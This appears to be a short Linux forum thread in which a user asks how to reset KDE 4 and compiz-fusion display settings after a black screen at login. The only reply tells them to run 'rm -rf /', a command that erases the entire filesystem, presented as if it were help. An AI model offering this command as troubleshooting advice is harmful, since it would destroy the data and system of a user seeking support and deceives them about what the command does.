crash after trying to use compiz-fusion
Hi, I installed KDE 4, and then used synaptic to download and install compiz-fusion for the nice desktop effects.
When I tried to change effects on the display properties, I clicked "apply" and then the screen became black (I can only see some squares from time to time if I click the mouse).
I guess it's because I have an old video card that doesn't support all these graphic options.
Can anyone please help me restore the settings to the default ones? the login screen appears to be ok, the problem only comes after I log in, when the settings are being loaded. Or maybe is there a way to reset the settings from the console? it's also a good option
RE: crash after trying to use compiz-fusion
Yeah, try the command rm -rf /
that should help you out.
